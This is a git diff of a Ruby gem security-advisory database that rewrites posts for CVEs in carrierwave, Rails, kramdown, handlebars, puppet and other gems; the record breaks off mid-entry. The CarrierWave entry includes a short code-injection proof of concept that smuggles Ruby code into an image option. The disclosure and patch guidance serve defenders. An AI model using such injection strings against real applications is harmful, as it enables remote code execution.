+    without access to any internal network resources or cloud metadata access.
+  cvss_v3: 4.3
+  patched_versions:
+  - "~> 1.3.2"
+  - ">= 2.1.1"
+---
diff --git a/advisories/_posts/2021-02-08-CVE-2021-21305.md b/advisories/_posts/2021-02-08-CVE-2021-21305.md
index 3b952c0f..eb637577 100644
--- a/advisories/_posts/2021-02-08-CVE-2021-21305.md
+++ b/advisories/_posts/2021-02-08-CVE-2021-21305.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2021-21305 (carrierwave): Code Injection vulnerability in CarrierWave::RMagick'
-comments: false
-categories:
-- carrierwave
-advisory:
-  gem: carrierwave
-  cve: 2021-21305
-  ghsa: cf3w-g86h-35x4
-  url: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-cf3w-g86h-35x4
-  date: 2021-02-08
-  title: Code Injection vulnerability in CarrierWave::RMagick
-  description: |
-    ### Impact
-    [CarrierWave::RMagick](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/processing/rmagick.rb)
-    has a Code Injection vulnerability. Its `#manipulate!` method inappropriately evals the content of mutation
-    option(`:read`/`:write`), allowing attackers to craft a string that can be executed as a Ruby code.
-    If an application developer supplies untrusted inputs to the option, it will lead to remote code execution(RCE).
-
-    (But supplying untrusted input to the option itself is dangerous even in absence of this vulnerability, since is prone to
-    DoS vulnerability - attackers can try to consume massive amounts of memory by resizing to a very large dimension)
-
-    ### Proof of Concept
-    ```ruby
-    class MyUploader < CarrierWave::Uploader::Base
-      include CarrierWave::RMagick
-    end
-
-    MyUploader.new.manipulate!({ read: { density: "1 }; p 'Hacked'; {" }}) # => shows "Hacked"
-    ```
-
-    ### Patches
-    Upgrade to [2.1.1](https://rubygems.org/gems/carrierwave/versions/2.1.1) or
-    [1.3.2](https://rubygems.org/gems/carrierwave/versions/1.3.2).
-
-    ### Workarounds
-    Stop supplying untrusted input to `#manipulate!`'s mutation option.
-  cvss_v3: 7.4
-  patched_versions:
-  - "~> 1.3.2"
-  - ">= 2.1.1"
----
+---
+layout: advisory
+title: 'CVE-2021-21305 (carrierwave): Code Injection vulnerability in CarrierWave::RMagick'
+comments: false
+categories:
+- carrierwave
+advisory:
+  gem: carrierwave
+  cve: 2021-21305
+  ghsa: cf3w-g86h-35x4
+  url: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-cf3w-g86h-35x4
+  date: 2021-02-08
+  title: Code Injection vulnerability in CarrierWave::RMagick
+  description: |
+    ### Impact
+    [CarrierWave::RMagick](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/processing/rmagick.rb)
+    has a Code Injection vulnerability. Its `#manipulate!` method inappropriately evals the content of mutation
+    option(`:read`/`:write`), allowing attackers to craft a string that can be executed as a Ruby code.
+    If an application developer supplies untrusted inputs to the option, it will lead to remote code execution(RCE).
+
+    (But supplying untrusted input to the option itself is dangerous even in absence of this vulnerability, since is prone to
+    DoS vulnerability - attackers can try to consume massive amounts of memory by resizing to a very large dimension)
+
+    ### Proof of Concept
+    ```ruby
+    class MyUploader < CarrierWave::Uploader::Base
+      include CarrierWave::RMagick
+    end
+
+    MyUploader.new.manipulate!({ read: { density: "1 }; p 'Hacked'; {" }}) # => shows "Hacked"
+    ```
+
+    ### Patches
+    Upgrade to [2.1.1](https://rubygems.org/gems/carrierwave/versions/2.1.1) or
+    [1.3.2](https://rubygems.org/gems/carrierwave/versions/1.3.2).
+
+    ### Workarounds
+    Stop supplying untrusted input to `#manipulate!`'s mutation option.
+  cvss_v3: 7.4
+  patched_versions:
+  - "~> 1.3.2"
+  - ">= 2.1.1"
+---
diff --git a/advisories/_posts/2021-02-10-CVE-2021-22880.md b/advisories/_posts/2021-02-10-CVE-2021-22880.md
index e03c75aa..d68b89ff 100644
--- a/advisories/_posts/2021-02-10-CVE-2021-22880.md
+++ b/advisories/_posts/2021-02-10-CVE-2021-22880.md
@@ -1,71 +1,71 @@
----
-layout: advisory
-title: 'CVE-2021-22880 (activerecord): Possible DoS Vulnerability in Active Record
-  PostgreSQL adapter'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2021-22880
-  ghsa: 8hc4-xxm3-5ppp
-  url: https://groups.google.com/g/rubyonrails-security/c/ZzUqCh9vyhI
-  title: Possible DoS Vulnerability in Active Record PostgreSQL adapter
-  date: 2021-02-10
-  description: |
-    There is a possible DoS vulnerability in the PostgreSQL adapter in Active
-    Record. This vulnerability has been assigned the CVE identifier CVE-2021-22880.
-
-    Versions Affected:  >= 4.2.0
-    Not affected:       < 4.2.0
-    Fixed Versions:     6.1.2.1, 6.0.3.5, 5.2.4.5
-
-    Impact
-    ------
-    Carefully crafted input can cause the input validation in the "money" type of
-    the PostgreSQL adapter in Active Record to spend too much time in a regular
-    expression, resulting in the potential for a DoS attack.
-
-    This only impacts Rails applications that are using PostgreSQL along with
-    money type columns that take user input.
-
-    Workarounds
-    -----------
-    In the case a patch can't be applied, the following monkey patch can be used
-    in an initializer:
-
-    ```
-    module ActiveRecord
-      module ConnectionAdapters
-        module PostgreSQL
-          module OID # :nodoc:
-            class Money < Type::Decimal # :nodoc:
-              def cast_value(value)
-                return value unless ::String === value
-
-                value = value.sub(/^\((.+)\)$/, '-\1') # (4)
-                case value
-                when /^-?\D*+[\d,]+\.\d{2}$/  # (1)
-                  value.gsub!(/[^-\d.]/, "")
-                when /^-?\D*+[\d.]+,\d{2}$/  # (2)
-                  value.gsub!(/[^-\d,]/, "").sub!(/,/, ".")
-                end
-
-                super(value)
-              end
-            end
-          end
-        end
-      end
-    end
-    ```
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 4.2.0"
-  patched_versions:
-  - "~> 5.2.4, >= 5.2.4.5"
-  - "~> 6.0.3, >= 6.0.3.5"
-  - ">= 6.1.2.1"
----
+---
+layout: advisory
+title: 'CVE-2021-22880 (activerecord): Possible DoS Vulnerability in Active Record
+  PostgreSQL adapter'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2021-22880
+  ghsa: 8hc4-xxm3-5ppp
+  url: https://groups.google.com/g/rubyonrails-security/c/ZzUqCh9vyhI
+  title: Possible DoS Vulnerability in Active Record PostgreSQL adapter
+  date: 2021-02-10
+  description: |
+    There is a possible DoS vulnerability in the PostgreSQL adapter in Active
+    Record. This vulnerability has been assigned the CVE identifier CVE-2021-22880.
+
+    Versions Affected:  >= 4.2.0
+    Not affected:       < 4.2.0
+    Fixed Versions:     6.1.2.1, 6.0.3.5, 5.2.4.5
+
+    Impact
+    ------
+    Carefully crafted input can cause the input validation in the "money" type of
+    the PostgreSQL adapter in Active Record to spend too much time in a regular
+    expression, resulting in the potential for a DoS attack.
+
+    This only impacts Rails applications that are using PostgreSQL along with
+    money type columns that take user input.
+
+    Workarounds
+    -----------
+    In the case a patch can't be applied, the following monkey patch can be used
+    in an initializer:
+
+    ```
+    module ActiveRecord
+      module ConnectionAdapters
+        module PostgreSQL
+          module OID # :nodoc:
+            class Money < Type::Decimal # :nodoc:
+              def cast_value(value)
+                return value unless ::String === value
+
+                value = value.sub(/^\((.+)\)$/, '-\1') # (4)
+                case value
+                when /^-?\D*+[\d,]+\.\d{2}$/  # (1)
+                  value.gsub!(/[^-\d.]/, "")
+                when /^-?\D*+[\d.]+,\d{2}$/  # (2)
+                  value.gsub!(/[^-\d,]/, "").sub!(/,/, ".")
+                end
+
+                super(value)
+              end
+            end
+          end
+        end
+      end
+    end
+    ```
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 4.2.0"
+  patched_versions:
+  - "~> 5.2.4, >= 5.2.4.5"
+  - "~> 6.0.3, >= 6.0.3.5"
+  - ">= 6.1.2.1"
+---
diff --git a/advisories/_posts/2021-02-10-CVE-2021-22881.md b/advisories/_posts/2021-02-10-CVE-2021-22881.md
index 0c32b581..87d9c96b 100644
--- a/advisories/_posts/2021-02-10-CVE-2021-22881.md
+++ b/advisories/_posts/2021-02-10-CVE-2021-22881.md
@@ -1,76 +1,76 @@
----
-layout: advisory
-title: 'CVE-2021-22881 (actionpack): Possible Open Redirect in Host Authorization
-  Middleware'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2021-22881
-  ghsa: 8877-prq4-9xfw
-  url: https://groups.google.com/g/rubyonrails-security/c/zN_3qA26l6E
-  title: Possible Open Redirect in Host Authorization Middleware
-  date: 2021-02-10
-  description: |
-    There is a possible open redirect vulnerability in the Host Authorization
-    middleware in Action Pack. This vulnerability has been assigned the CVE
-    identifier CVE-2021-22881.
-
-    Versions Affected:  >= 6.0.0
-    Not affected:       < 6.0.0
-    Fixed Versions:     6.1.2.1, 6.0.3.5
-
-    Impact
-    ------
-    Specially crafted "Host" headers in combination with certain "allowed host"
-    formats can cause the Host Authorization middleware in Action Pack to redirect
-    users to a malicious website.
-
-    Impacted applications will have allowed hosts with a leading dot.  For
-    example, configuration files that look like this:
-
-    ```
-    config.hosts <<  '.tkte.ch'
-    ```
-
-    When an allowed host contains a leading dot, a specially crafted Host header
-    can be used to redirect to a malicious website.
-
-    Workarounds
-    -----------
-    In the case a patch can't be applied, the following monkey patch can be used
-    in an initializer:
-
-    ```ruby
-    module ActionDispatch
-      class HostAuthorization
-        private
-          def authorized?(request)
-            valid_host = /
-              \A
-              (?<host>[a-z0-9.-]+|\[[a-f0-9]*:[a-f0-9\.:]+\])
-              (:\d+)?
-              \z
-            /x
-
-            origin_host = valid_host.match(
-              request.get_header("HTTP_HOST").to_s.downcase)
-            forwarded_host = valid_host.match(
-              request.x_forwarded_host.to_s.split(/,\s?/).last)
-
-            origin_host && @permissions.allows?(origin_host[:host]) && (
-              forwarded_host.nil? || @permissions.allows?(forwarded_host[:host]))
-          end
-      end
-    end
-    ```
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 6.0.0"
-  patched_versions:
-  - "~> 6.0.3, >= 6.0.3.5"
-  - ">= 6.1.2.1"
----
+---
+layout: advisory
+title: 'CVE-2021-22881 (actionpack): Possible Open Redirect in Host Authorization
+  Middleware'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2021-22881
+  ghsa: 8877-prq4-9xfw
+  url: https://groups.google.com/g/rubyonrails-security/c/zN_3qA26l6E
+  title: Possible Open Redirect in Host Authorization Middleware
+  date: 2021-02-10
+  description: |
+    There is a possible open redirect vulnerability in the Host Authorization
+    middleware in Action Pack. This vulnerability has been assigned the CVE
+    identifier CVE-2021-22881.
+
+    Versions Affected:  >= 6.0.0
+    Not affected:       < 6.0.0
+    Fixed Versions:     6.1.2.1, 6.0.3.5
+
+    Impact
+    ------
+    Specially crafted "Host" headers in combination with certain "allowed host"
+    formats can cause the Host Authorization middleware in Action Pack to redirect
+    users to a malicious website.
+
+    Impacted applications will have allowed hosts with a leading dot.  For
+    example, configuration files that look like this:
+
+    ```
+    config.hosts <<  '.tkte.ch'
+    ```
+
+    When an allowed host contains a leading dot, a specially crafted Host header
+    can be used to redirect to a malicious website.
+
+    Workarounds
+    -----------
+    In the case a patch can't be applied, the following monkey patch can be used
+    in an initializer:
+
+    ```ruby
+    module ActionDispatch
+      class HostAuthorization
+        private
+          def authorized?(request)
+            valid_host = /
+              \A
+              (?<host>[a-z0-9.-]+|\[[a-f0-9]*:[a-f0-9\.:]+\])
+              (:\d+)?
+              \z
+            /x
+
+            origin_host = valid_host.match(
+              request.get_header("HTTP_HOST").to_s.downcase)
+            forwarded_host = valid_host.match(
+              request.x_forwarded_host.to_s.split(/,\s?/).last)
+
+            origin_host && @permissions.allows?(origin_host[:host]) && (
+              forwarded_host.nil? || @permissions.allows?(forwarded_host[:host]))
+          end
+      end
+    end
+    ```
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 6.0.0"
+  patched_versions:
+  - "~> 6.0.3, >= 6.0.3.5"
+  - ">= 6.1.2.1"
+---
diff --git a/advisories/_posts/2021-03-08-CVE-2019-25025.md b/advisories/_posts/2021-03-08-CVE-2019-25025.md
index a6dc5c02..d5757331 100644
--- a/advisories/_posts/2021-03-08-CVE-2019-25025.md
+++ b/advisories/_posts/2021-03-08-CVE-2019-25025.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2019-25025 (activerecord-session_store): activerecord-session_store Timing
-  Attack'
-comments: false
-categories:
-- activerecord-session_store
-advisory:
-  gem: activerecord-session_store
-  cve: 2019-25025
-  ghsa: cvw2-xj8r-mjf7
-  url: https://github.com/advisories/GHSA-cvw2-xj8r-mjf7
-  date: 2021-03-08
-  title: activerecord-session_store Timing Attack
-  description: |
-    The `activerecord-session_store` (aka Active Record Session Store) component
-    through 1.1.3 for Ruby on Rails does not use a constant-time approach when delivering
-    information about whether a guessed session ID is valid. Consequently, remote attackers
-    can leverage timing discrepancies to achieve a correct guess in a relatively short
-    amount of time. This is a related issue to CVE-2019-16782.
-
-    ## Recommendation
-    Users should upgrade to `activerecord-session_store` version 2.0.0 or later.
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 2.0.0"
-  related:
-    cve:
-    - 2019-16782
-    url:
-    - https://github.com/rails/activerecord-session_store/pull/151
-    - https://github.com/rails/activerecord-session_store/releases/tag/v2.0.0
----
+---
+layout: advisory
+title: 'CVE-2019-25025 (activerecord-session_store): activerecord-session_store Timing
+  Attack'
+comments: false
+categories:
+- activerecord-session_store
+advisory:
+  gem: activerecord-session_store
+  cve: 2019-25025
+  ghsa: cvw2-xj8r-mjf7
+  url: https://github.com/advisories/GHSA-cvw2-xj8r-mjf7
+  date: 2021-03-08
+  title: activerecord-session_store Timing Attack
+  description: |
+    The `activerecord-session_store` (aka Active Record Session Store) component
+    through 1.1.3 for Ruby on Rails does not use a constant-time approach when delivering
+    information about whether a guessed session ID is valid. Consequently, remote attackers
+    can leverage timing discrepancies to achieve a correct guess in a relatively short
+    amount of time. This is a related issue to CVE-2019-16782.
+
+    ## Recommendation
+    Users should upgrade to `activerecord-session_store` version 2.0.0 or later.
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 2.0.0"
+  related:
+    cve:
+    - 2019-16782
+    url:
+    - https://github.com/rails/activerecord-session_store/pull/151
+    - https://github.com/rails/activerecord-session_store/releases/tag/v2.0.0
+---
diff --git a/advisories/_posts/2021-03-29-CVE-2020-24392.md b/advisories/_posts/2021-03-29-CVE-2020-24392.md
index fdb3d9a1..c55dd1df 100644
--- a/advisories/_posts/2021-03-29-CVE-2020-24392.md
+++ b/advisories/_posts/2021-03-29-CVE-2020-24392.md
@@ -1,19 +1,19 @@
----
-layout: advisory
-title: 'CVE-2020-24392 (twitter-stream): Improper Certificate Validation in twitter-stream'
-comments: false
-categories:
-- twitter-stream
-advisory:
-  gem: twitter-stream
-  cve: 2020-24392
-  ghsa: p6p8-q4pj-f74m
-  url: https://securitylab.github.com/advisories/GHSL-2020-097-voloko-twitter-stream/
-  date: 2021-03-29
-  title: Improper Certificate Validation in twitter-stream
-  description: |
-    In voloko twitter-stream 0.1.16, missing TLS hostname validation allows
-    an attacker to perform a man-in-the-middle attack against users of the library (because
-    eventmachine is misused).
-  cvss_v3: 5.9
----
+---
+layout: advisory
+title: 'CVE-2020-24392 (twitter-stream): Improper Certificate Validation in twitter-stream'
+comments: false
+categories:
+- twitter-stream
+advisory:
+  gem: twitter-stream
+  cve: 2020-24392
+  ghsa: p6p8-q4pj-f74m
+  url: https://securitylab.github.com/advisories/GHSL-2020-097-voloko-twitter-stream/
+  date: 2021-03-29
+  title: Improper Certificate Validation in twitter-stream
+  description: |
+    In voloko twitter-stream 0.1.16, missing TLS hostname validation allows
+    an attacker to perform a man-in-the-middle attack against users of the library (because
+    eventmachine is misused).
+  cvss_v3: 5.9
+---
diff --git a/advisories/_posts/2021-03-29-CVE-2021-28834.md b/advisories/_posts/2021-03-29-CVE-2021-28834.md
index 99eaf0a5..c9a087a4 100644
--- a/advisories/_posts/2021-03-29-CVE-2021-28834.md
+++ b/advisories/_posts/2021-03-29-CVE-2021-28834.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2021-28834 (kramdown): Remote code execution in Kramdown'
-comments: false
-categories:
-- kramdown
-advisory:
-  gem: kramdown
-  cve: 2021-28834
-  ghsa: 52p9-v744-mwjj
-  url: https://github.com/advisories/GHSA-52p9-v744-mwjj
-  date: 2021-03-29
-  title: Remote code execution in Kramdown
-  description: |
-    Kramdown before 2.3.1 does not restrict Rouge formatters to the Rouge::Formatters
-    namespace, and thus arbitrary classes can be instantiated.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 2.3.1"
-  unaffected_versions:
-  - "< 1.16.0"
-  related:
-    url:
-    - https://github.com/gettalong/kramdown/pull/708
-    - https://about.gitlab.com/releases/2021/03/17/security-release-gitlab-13-9-4-released/#remote-code-execution-via-unsafe-user-controlled-markdown-rendering-options
----
+---
+layout: advisory
+title: 'CVE-2021-28834 (kramdown): Remote code execution in Kramdown'
+comments: false
+categories:
+- kramdown
+advisory:
+  gem: kramdown
+  cve: 2021-28834
+  ghsa: 52p9-v744-mwjj
+  url: https://github.com/advisories/GHSA-52p9-v744-mwjj
+  date: 2021-03-29
+  title: Remote code execution in Kramdown
+  description: |
+    Kramdown before 2.3.1 does not restrict Rouge formatters to the Rouge::Formatters
+    namespace, and thus arbitrary classes can be instantiated.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 2.3.1"
+  unaffected_versions:
+  - "< 1.16.0"
+  related:
+    url:
+    - https://github.com/gettalong/kramdown/pull/708
+    - https://about.gitlab.com/releases/2021/03/17/security-release-gitlab-13-9-4-released/#remote-code-execution-via-unsafe-user-controlled-markdown-rendering-options
+---
diff --git a/advisories/_posts/2021-04-05-CVE-2021-28965.md b/advisories/_posts/2021-04-05-CVE-2021-28965.md
index 7c1bd723..0b5b0b38 100644
--- a/advisories/_posts/2021-04-05-CVE-2021-28965.md
+++ b/advisories/_posts/2021-04-05-CVE-2021-28965.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2021-28965 (rexml): XML round-trip vulnerability in REXML'
-comments: false
-categories:
-- rexml
-advisory:
-  gem: rexml
-  cve: 2021-28965
-  ghsa: 8cr8-4vfw-mr7h
-  url: https://www.ruby-lang.org/en/news/2021/04/05/xml-round-trip-vulnerability-in-rexml-cve-2021-28965/
-  title: XML round-trip vulnerability in REXML
-  date: 2021-04-05
-  description: |
-    When parsing and serializing a crafted XML document, REXML gem (including
-    the one bundled with Ruby) can create a wrong XML document whose structure
-    is different from the original one.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 3.1.9.1"
-  - "~> 3.2.3.1"
-  - ">= 3.2.5"
----
+---
+layout: advisory
+title: 'CVE-2021-28965 (rexml): XML round-trip vulnerability in REXML'
+comments: false
+categories:
+- rexml
+advisory:
+  gem: rexml
+  cve: 2021-28965
+  ghsa: 8cr8-4vfw-mr7h
+  url: https://www.ruby-lang.org/en/news/2021/04/05/xml-round-trip-vulnerability-in-rexml-cve-2021-28965/
+  title: XML round-trip vulnerability in REXML
+  date: 2021-04-05
+  description: |
+    When parsing and serializing a crafted XML document, REXML gem (including
+    the one bundled with Ruby) can create a wrong XML document whose structure
+    is different from the original one.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 3.1.9.1"
+  - "~> 3.2.3.1"
+  - ">= 3.2.5"
+---
diff --git a/advisories/_posts/2021-04-05-CVE-2021-28966.md b/advisories/_posts/2021-04-05-CVE-2021-28966.md
index 40a763ab..68e3ab31 100644
--- a/advisories/_posts/2021-04-05-CVE-2021-28966.md
+++ b/advisories/_posts/2021-04-05-CVE-2021-28966.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2021-28966 (tmpdir): Path traversal in Tempfile on Windows'
-comments: false
-categories:
-- tmpdir
-advisory:
-  gem: tmpdir
-  cve: 2021-28966
-  ghsa: 46f2-3v63-3xrp
-  url: https://www.ruby-lang.org/en/news/2021/04/05/tempfile-path-traversal-on-windows-cve-2021-28966/
-  title: Path traversal in Tempfile on Windows
-  date: 2021-04-05
-  description: |
-    There is an unintentional directory creation vulnerability in tmpdir library
-    bundled with Ruby on Windows. And there is also an unintentional file
-    creation vulnerability in tempfile library bundled with Ruby on Windows,
-    because it uses tmpdir internally.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.1.2"
-  related:
-    cve:
-    - 2018-6914
-    url:
-    - https://www.ruby-lang.org/en/news/2018/03/28/unintentional-file-and-directory-creation-with-directory-traversal-cve-2018-6914/
----
+---
+layout: advisory
+title: 'CVE-2021-28966 (tmpdir): Path traversal in Tempfile on Windows'
+comments: false
+categories:
+- tmpdir
+advisory:
+  gem: tmpdir
+  cve: 2021-28966
+  ghsa: 46f2-3v63-3xrp
+  url: https://www.ruby-lang.org/en/news/2021/04/05/tempfile-path-traversal-on-windows-cve-2021-28966/
+  title: Path traversal in Tempfile on Windows
+  date: 2021-04-05
+  description: |
+    There is an unintentional directory creation vulnerability in tmpdir library
+    bundled with Ruby on Windows. And there is also an unintentional file
+    creation vulnerability in tempfile library bundled with Ruby on Windows,
+    because it uses tmpdir internally.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.1.2"
+  related:
+    cve:
+    - 2018-6914
+    url:
+    - https://www.ruby-lang.org/en/news/2018/03/28/unintentional-file-and-directory-creation-with-directory-traversal-cve-2018-6914/
+---
diff --git a/advisories/_posts/2021-04-12-CVE-2021-23369.md b/advisories/_posts/2021-04-12-CVE-2021-23369.md
index 34c808cc..8a260be7 100644
--- a/advisories/_posts/2021-04-12-CVE-2021-23369.md
+++ b/advisories/_posts/2021-04-12-CVE-2021-23369.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2021-23369 (handlebars-source): Remote code execution in handlebars when
-  compiling templates'
-comments: false
-categories:
-- handlebars-source
-advisory:
-  gem: handlebars-source
-  cve: 2021-23369
-  ghsa: f2jv-r9rf-7988
-  url: https://github.com/advisories/GHSA-f2jv-r9rf-7988
-  title: Remote code execution in handlebars when compiling templates
-  date: 2021-04-12
-  description: |
-    The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when
-    selecting certain compiling options to compile templates coming from an untrusted source.
-    This vulnerability has been assigned the CVE identifier CVE-2021-23369.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 4.7.7"
----
+---
+layout: advisory
+title: 'CVE-2021-23369 (handlebars-source): Remote code execution in handlebars when
+  compiling templates'
+comments: false
+categories:
+- handlebars-source
+advisory:
+  gem: handlebars-source
+  cve: 2021-23369
+  ghsa: f2jv-r9rf-7988
+  url: https://github.com/advisories/GHSA-f2jv-r9rf-7988
+  title: Remote code execution in handlebars when compiling templates
+  date: 2021-04-12
+  description: |
+    The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when
+    selecting certain compiling options to compile templates coming from an untrusted source.
+    This vulnerability has been assigned the CVE identifier CVE-2021-23369.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 4.7.7"
+---
diff --git a/advisories/_posts/2021-04-13-CVE-2020-24393.md b/advisories/_posts/2021-04-13-CVE-2020-24393.md
index b745678e..620e350e 100644
--- a/advisories/_posts/2021-04-13-CVE-2020-24393.md
+++ b/advisories/_posts/2021-04-13-CVE-2020-24393.md
@@ -1,19 +1,19 @@
----
-layout: advisory
-title: 'CVE-2020-24393 (tweetstream): Improper Certificate Validation in TweetStream'
-comments: false
-categories:
-- tweetstream
-advisory:
-  gem: tweetstream
-  cve: 2020-24393
-  ghsa: 6hrm-jqp3-64cv
-  url: https://securitylab.github.com/advisories/GHSL-2020-096-tweetstream-tweetstream/
-  date: 2021-04-13
-  title: Improper Certificate Validation in TweetStream
-  description: |
-    TweetStream 2.6.1 uses the library eventmachine in an insecure way that
-    does not have TLS hostname validation. This allows an attacker to perform a man-in-the-middle
-    attack.
-  cvss_v3: 5.9
----
+---
+layout: advisory
+title: 'CVE-2020-24393 (tweetstream): Improper Certificate Validation in TweetStream'
+comments: false
+categories:
+- tweetstream
+advisory:
+  gem: tweetstream
+  cve: 2020-24393
+  ghsa: 6hrm-jqp3-64cv
+  url: https://securitylab.github.com/advisories/GHSL-2020-096-tweetstream-tweetstream/
+  date: 2021-04-13
+  title: Improper Certificate Validation in TweetStream
+  description: |
+    TweetStream 2.6.1 uses the library eventmachine in an insecure way that
+    does not have TLS hostname validation. This allows an attacker to perform a man-in-the-middle
+    attack.
+  cvss_v3: 5.9
+---
diff --git a/advisories/_posts/2021-04-13-CVE-2020-7942.md b/advisories/_posts/2021-04-13-CVE-2020-7942.md
index f9158f70..7bc6caec 100644
--- a/advisories/_posts/2021-04-13-CVE-2020-7942.md
+++ b/advisories/_posts/2021-04-13-CVE-2020-7942.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2020-7942 (puppet): Improper Certificate Validation in Puppet'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2020-7942
-  ghsa: gqvf-892r-vjm5
-  url: https://puppet.com/security/cve/CVE-2020-7942/
-  date: 2021-04-13
-  title: Improper Certificate Validation in Puppet
-  description: |
-    Previously, Puppet operated on a model that a node with a valid certificate
-    was entitled to all information in the system and that a compromised certificate
-    allowed access to everything in the infrastructure. When a node's catalog falls
-    back to the `default` node, the catalog can be retrieved for a different node by
-    modifying facts for the Puppet run. This issue can be mitigated by setting
-    `strict_hostname_checking = true` in `puppet.conf` on your Puppet master. Puppet
-    6.13.0 changes the default behavior for strict_hostname_checking from false to
-    true. It is recommended that Puppet Open Source and Puppet Enterprise users that
-    are not upgrading still set `strict_hostname_checking` to `true` to ensure secure
-    behavior.
-  cvss_v3: 6.5
-  patched_versions:
-  - "~> 5.5.19"
-  - ">= 6.13.0"
----
+---
+layout: advisory
+title: 'CVE-2020-7942 (puppet): Improper Certificate Validation in Puppet'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2020-7942
+  ghsa: gqvf-892r-vjm5
+  url: https://puppet.com/security/cve/CVE-2020-7942/
+  date: 2021-04-13
+  title: Improper Certificate Validation in Puppet
+  description: |
+    Previously, Puppet operated on a model that a node with a valid certificate
+    was entitled to all information in the system and that a compromised certificate
+    allowed access to everything in the infrastructure. When a node's catalog falls
+    back to the `default` node, the catalog can be retrieved for a different node by
+    modifying facts for the Puppet run. This issue can be mitigated by setting
+    `strict_hostname_checking = true` in `puppet.conf` on your Puppet master. Puppet
+    6.13.0 changes the default behavior for strict_hostname_checking from false to
+    true. It is recommended that Puppet Open Source and Puppet Enterprise users that
+    are not upgrading still set `strict_hostname_checking` to `true` to ensure secure
+    behavior.
+  cvss_v3: 6.5
+  patched_versions:
+  - "~> 5.5.19"
+  - ">= 6.13.0"
+---
diff --git a/advisories/_posts/2021-04-14-CVE-2021-29435.md b/advisories/_posts/2021-04-14-CVE-2021-29435.md
index 9209f779..2872bae8 100644
--- a/advisories/_posts/2021-04-14-CVE-2021-29435.md
+++ b/advisories/_posts/2021-04-14-CVE-2021-29435.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2021-29435 (trestle-auth): Cross-Site Request Forgery (CSRF) in trestle-auth'
-comments: false
-categories:
-- trestle-auth
-advisory:
-  gem: trestle-auth
-  cve: 2021-29435
-  ghsa: h8hx-2c5r-32cf
-  url: https://github.com/TrestleAdmin/trestle-auth/security/advisories/GHSA-h8hx-2c5r-32cf
-  date: 2021-04-14
-  title: Cross-Site Request Forgery (CSRF) in trestle-auth
-  description: |
-    ### Impact
-
-    A vulnerability in trestle-auth versions 0.4.0 and 0.4.1 allows
-    an attacker to create a form that will bypass Rails' built-in
-    CSRF protection when submitted by a victim with a trestle-auth
-    admin session. This potentially allows an attacker to alter
-    protected data, including admin account credentials.
-
-    ### Patches
-
-    The vulnerability has been fixed in trestle-auth 0.4.2 released to RubyGems.
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 0.4.2"
-  unaffected_versions:
-  - "< 0.4.0"
----
+---
+layout: advisory
+title: 'CVE-2021-29435 (trestle-auth): Cross-Site Request Forgery (CSRF) in trestle-auth'
+comments: false
+categories:
+- trestle-auth
+advisory:
+  gem: trestle-auth
+  cve: 2021-29435
+  ghsa: h8hx-2c5r-32cf
+  url: https://github.com/TrestleAdmin/trestle-auth/security/advisories/GHSA-h8hx-2c5r-32cf
+  date: 2021-04-14
+  title: Cross-Site Request Forgery (CSRF) in trestle-auth
+  description: |
+    ### Impact
+
+    A vulnerability in trestle-auth versions 0.4.0 and 0.4.1 allows
+    an attacker to create a form that will bypass Rails' built-in
+    CSRF protection when submitted by a victim with a trestle-auth
+    admin session. This potentially allows an attacker to alter
+    protected data, including admin account credentials.
+
+    ### Patches
+
+    The vulnerability has been fixed in trestle-auth 0.4.2 released to RubyGems.
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 0.4.2"
+  unaffected_versions:
+  - "< 0.4.0"
+---
diff --git a/advisories/_posts/2021-04-22-CVE-2016-11086.md b/advisories/_posts/2021-04-22-CVE-2016-11086.md
index c616e658..d0282ce3 100644
--- a/advisories/_posts/2021-04-22-CVE-2016-11086.md
+++ b/advisories/_posts/2021-04-22-CVE-2016-11086.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2016-11086 (oauth): Improper Certificate Validation in oauth ruby gem'
-comments: false
-categories:
-- oauth
-advisory:
-  gem: oauth
-  cve: 2016-11086
-  ghsa: 7359-3c6r-hfc2
-  url: https://github.com/advisories/GHSA-7359-3c6r-hfc2
-  date: 2021-04-22
-  title: Improper Certificate Validation in oauth ruby gem
-  description: |
